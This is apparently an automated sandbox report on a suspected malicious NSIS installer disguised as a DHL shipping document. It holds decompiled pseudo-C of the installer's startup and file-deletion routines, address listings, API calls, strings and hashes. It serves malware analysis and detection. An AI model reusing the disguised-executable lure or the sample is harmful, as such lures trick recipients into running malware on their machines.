					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\jones\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\DHL_SHIPPING_DOCUMENT.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                              0x0040364e
                                                              0x0040364f
                                                              0x00403656
                                                              0x00403659
                                                              0x00403660
                                                              0x00403663
                                                              0x00403676
                                                              0x0040367c
                                                              0x0040367f
                                                              0x00403682
                                                              0x00403690
                                                              0x00403698
                                                              0x004036a3
                                                              0x004036bc
                                                              0x004036be
                                                              0x004036c6
                                                              0x004036c6
                                                              0x004036d1
                                                              0x004036d3
                                                              0x004036d3
                                                              0x004036e8
                                                              0x0040370d
                                                              0x0040371b
                                                              0x0040371e
                                                              0x00403725
                                                              0x0040372c
                                                              0x0040372c
                                                              0x00403725
                                                              0x0040372e
                                                              0x00403733
                                                              0x00403734
                                                              0x00403740
                                                              0x00403744
                                                              0x0040374b
                                                              0x00403759
                                                              0x0040375e
                                                              0x00403765
                                                              0x00403769
                                                              0x0040376d
                                                              0x0040376f
                                                              0x0040376f
                                                              0x0040376d
                                                              0x00403776
                                                              0x0040377d
                                                              0x00403783
                                                              0x0040379b
                                                              0x004037ab
                                                              0x004037b0
                                                              0x004037b6
                                                              0x004037bd
                                                              0x004037c4
                                                              0x004037c6
                                                              0x004037c7
                                                              0x004037d1
                                                              0x004037d8
                                                              0x004037da
                                                              0x004037dc
                                                              0x004037dc
                                                              0x004037ef
                                                              0x004037f1
                                                              0x004038eb
                                                              0x004038eb
                                                              0x004038ee
                                                              0x004038f1
                                                              0x00000000
                                                              0x00000000
                                                              0x004037fb
                                                              0x004037fc
                                                              0x004037ff
                                                              0x00403808
                                                              0x00403808
                                                              0x0040380b
                                                              0x0040380e
                                                              0x00403811
                                                              0x00403814
                                                              0x00403814
                                                              0x00403814
                                                              0x00403815
                                                              0x00403819
                                                              0x004038d9
                                                              0x004038e2
                                                              0x004038e4
                                                              0x004038e7
                                                              0x004038ea
                                                              0x004038ea
                                                              0x004038ea
                                                              0x00000000
                                                              0x0040381f
                                                              0x00403820
                                                              0x00403821
                                                              0x00403825
                                                              0x0040383f
                                                              0x00403846
                                                              0x00403859
                                                              0x0040385a
                                                              0x0040386f
                                                              0x00403874
                                                              0x00403876
                                                              0x00403878
                                                              0x00403894
                                                              0x0040389b
                                                              0x004038ae
                                                              0x004038af
                                                              0x004038c4
                                                              0x004038ca
                                                              0x004038cc
                                                              0x004038ce
                                                              0x004038d6
                                                              0x004038d8
                                                              0x00000000
                                                              0x004038d8
                                                              0x004038d2
                                                              0x004038d4
                                                              0x004038f9
                                                              0x004038fd
                                                              0x00403906
                                                              0x0040390b
                                                              0x00403911
                                                              0x0040391c
                                                              0x0040391e
                                                              0x00403923
                                                              0x00403925
                                                              0x0040397d
                                                              0x00403982
                                                              0x0040398b
                                                              0x00403992
                                                              0x00403995
                                                              0x00403b6c
                                                              0x00403b6c
                                                              0x00403b71
                                                              0x00403b7a
                                                              0x00403b97
                                                              0x00403c0f
                                                              0x00403c0f
                                                              0x00403c17
                                                              0x00403c19
                                                              0x00403c19
                                                              0x00403c1f
                                                              0x00403c1f
                                                              0x00403bae
                                                              0x00403bba
                                                              0x00403bcb
                                                              0x00403bd2
                                                              0x00403bd9
                                                              0x00403bd9
                                                              0x00403be1
                                                              0x00403bed
                                                              0x00403bfb
                                                              0x00403c06
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403bef
                                                              0x00403bef
                                                              0x00403bf0
                                                              0x00403bf2
                                                              0x00403bf3
                                                              0x00403bf4
                                                              0x00403bf9
                                                              0x00403c08
                                                              0x00403c0a
                                                              0x00000000
                                                              0x00403c0a
                                                              0x00000000
                                                              0x00403bf9
                                                              0x00403bed
                                                              0x00403b84
                                                              0x00403b8b
                                                              0x00403b8b
                                                              0x004039a1
                                                              0x00403a48
                                                              0x00403a48
                                                              0x00403a54
                                                              0x00000000
                                                              0x00403a54
                                                              0x004039b2
                                                              0x004039ba
                                                              0x00403a0c
                                                              0x00403a0c
                                                              0x00403a12
                                                              0x00403a19
                                                              0x00403a67
                                                              0x00403a69
                                                              0x00403a6e
                                                              0x00403a70
                                                              0x00403a78
                                                              0x00403a78
                                                              0x00403a83
                                                              0x00403a88
                                                              0x00403a8f
                                                              0x00403a95
                                                              0x00403a97
                                                              0x00403b6a
                                                              0x00403b6a
                                                              0x00403b6a
                                                              0x00000000
                                                              0x00403a9d
                                                              0x00403a9d
                                                              0x00403a9f
                                                              0x00403aa0
                                                              0x00403aa9
                                                              0x00403aa2
                                                              0x00403aa2
                                                              0x00403aa2
                                                              0x00403aaf
                                                              0x00403ab7
                                                              0x00403abe
                                                              0x00403ac6
                                                              0x00403ac6
                                                              0x00403ad3
                                                              0x00403adf
                                                              0x00403ae9
                                                              0x00403ae9
                                                              0x00403aeb
                                                              0x00403af2
                                                              0x00403afc
                                                              0x00403b08
                                                              0x00403b0e
                                                              0x00403b14
                                                              0x00403b17
                                                              0x00403b21
                                                              0x00403b27
                                                              0x00403b29
                                                              0x00403b2d
                                                              0x00403b3e
                                                              0x00403b44
                                                              0x00403b49
                                                              0x00403b4b
                                                              0x00403b4e
                                                              0x00403b54
                                                              0x00403b54
                                                              0x00403b4b
                                                              0x00403b29
                                                              0x00403b57
                                                              0x00403b5e
                                                              0x00403b5e
                                                              0x00403b5e
                                                              0x00403b5e
                                                              0x00403b65
                                                              0x00000000
                                                              0x00403b65
                                                              0x00403a97
                                                              0x00403a1b
                                                              0x00403a1e
                                                              0x00403a22
                                                              0x00403a27
                                                              0x00403a29
                                                              0x00000000
                                                              0x00000000
                                                              0x00403a35
                                                              0x00403a40
                                                              0x00403a45
                                                              0x00000000
                                                              0x00403a45
                                                              0x004039c3
                                                              0x004039db
                                                              0x004039ec
                                                              0x004039ed
                                                              0x004039f1
                                                              0x004039f3
                                                              0x00403a01
                                                              0x00403a08
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403a08
                                                              0x00403a0a
                                                              0x00000000
                                                              0x00403a0a
                                                              0x0040392d
                                                              0x00403939
                                                              0x0040393e
                                                              0x00403943
                                                              0x00403945
                                                              0x00000000
                                                              0x00000000
                                                              0x0040394d
                                                              0x00403955
                                                              0x00403966
                                                              0x0040396e
                                                              0x00403970
                                                              0x00403975
                                                              0x00403977
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403977
                                                              0x00000000
                                                              0x004038d4
                                                              0x0040387d
                                                              0x0040387f
                                                              0x00000000
                                                              0x00000000
                                                              0x00403881
                                                              0x00403885
                                                              0x00403889
                                                              0x00403890
                                                              0x00403890
                                                              0x00403890
                                                              0x00403890
                                                              0x00000000
                                                              0x00403890
                                                              0x0040388b
                                                              0x0040388e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040388e
                                                              0x00403827
                                                              0x0040382b
                                                              0x0040382e
                                                              0x00403835
                                                              0x00403835
                                                              0x00000000
                                                              0x00403835
                                                              0x00403830
                                                              0x00403833
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403833
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403801
                                                              0x00403801
                                                              0x00403802
                                                              0x00403803
                                                              0x00403803
                                                              0x00000000
                                                              0x00403801
                                                              0x00000000

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                              • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                              • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                              • OleInitialize.OLE32(00000000), ref: 0040377D
                                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe",00000020,"C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe",00000000), ref: 004037E9
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe",00000000,?), ref: 00403A8F
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,00420F08,00000001), ref: 00403B21
                                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                              • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                              • OleUninitialize.OLE32(?), ref: 00403B71
                                                              • ExitProcess.KERNEL32 ref: 00403B8B
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                              • ExitProcess.KERNEL32 ref: 00403C1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                              • String ID: "C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                              • API String ID: 2292928366-3595984370
                                                              • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                              • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                              • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                              • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                              C-Code - Quality: 98%
                                                              			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                              0x00405d7e
                                                              0x00405d83
                                                              0x00405d8c
                                                              0x00405d8f
                                                              0x00405d97
                                                              0x00405d9a
                                                              0x00405d9d
                                                              0x00405da5
                                                              0x00405da7
                                                              0x00405da8
                                                              0x00000000
                                                              0x00405da8
                                                              0x00405db3
                                                              0x00405db6
                                                              0x00405db6
                                                              0x00405db6
                                                              0x00405dba
                                                              0x00405dcd
                                                              0x00405dd4
                                                              0x00405dd9
                                                              0x00405ddd
